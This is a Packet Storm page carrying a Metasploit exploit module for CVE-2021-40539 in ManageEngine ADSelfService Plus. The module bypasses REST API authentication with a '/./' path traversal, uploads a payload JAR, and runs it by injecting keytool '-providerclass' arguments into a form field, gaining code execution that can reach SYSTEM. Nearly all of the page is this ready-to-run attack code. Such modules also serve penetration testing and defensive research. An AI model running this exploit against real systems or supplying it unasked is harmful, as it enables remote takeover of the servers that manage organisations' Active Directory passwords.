what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ADSelfService Plus Authentication Bypass / Code Execution

ManageEngine ADSelfService Plus Authentication Bypass / Code Execution
Posted Nov 27, 2021
Authored by mr_me, wvu, Wilfried Becard, Antoine Cervoise | Site metasploit.com

This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.

tags | exploit, bypass
advisories | CVE-2021-40539
SHA-256 | 258a080b77eaface80577b4886f47493eafef016bf16d63a1567107d6f5b76cd

ManageEngine ADSelfService Plus Authentication Bypass / Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',
'Description' => %q{
This module exploits CVE-2021-40539, a REST API authentication bypass
vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and
execute it as the user running ADSelfService Plus - which is SYSTEM if
started as a service.
},
'Author' => [
# Discovered by unknown threat actors
'Antoine Cervoise', # Independent analysis and RCE
'Wilfried B├ęcard', # Independent analysis and RCE
'mr_me', # keytool classloading technique
'wvu' # Initial analysis and module
],
'References' => [
['CVE', '2021-40539'],
['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],
['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],
['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],
['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']
],
'DisclosureDate' => '2021-09-07',
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false, # true if ADSelfService Plus is run as a service
'Targets' => [
['Java Dropper', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8888
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])
])
end

def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
'vars_post' => {
'methodToCall' => 'previewMobLogo'
}
)

unless res
return CheckCode::Unknown('Target failed to respond to check.')
end

unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\.jpeg})
return CheckCode::Safe('Failed to bypass REST API authentication.')
end

CheckCode::Vulnerable('Successfully bypassed REST API authentication.')
end

def exploit
upload_payload_jar
execute_payload_jar
end

def upload_payload_jar
print_status("Uploading payload JAR: #{jar_filename}")

jar = payload.encoded_jar
jar.add_file("#{class_name}.class", constructor_class) # Hack, tbh

form = Rex::MIME::Message.new
form.add_part('unspecified', nil, nil, 'form-data; name="methodToCall"')
form.add_part('yas', nil, nil, 'form-data; name="Save"')
form.add_part('smartcard', nil, nil, 'form-data; name="form"')
form.add_part('Add', nil, nil, 'form-data; name="operation"')
form.add_part(jar.pack, 'application/java-archive', 'binary',
%(form-data; name="CERTIFICATE_PATH"; filename="#{jar_filename}"))

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)

unless res&.code == 404
fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')
end

# C:\ManageEngine\ADSelfService Plus\bin (working directory)
register_file_for_cleanup(jar_filename)

print_good('Successfully uploaded payload JAR')
end

def execute_payload_jar
print_status('Executing payload JAR')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),
'vars_post' => {
'methodToCall' => 'openSSLTool',
'action' => 'generateCSR',
# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html
'VALIDITY' => "#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}"
}
)

unless res&.code == 404
fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')
end

print_good('Successfully executed payload JAR')
end

def jar_filename
@jar_filename ||= "#{rand_text_alphanumeric(8..16)}.jar"
end

end
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close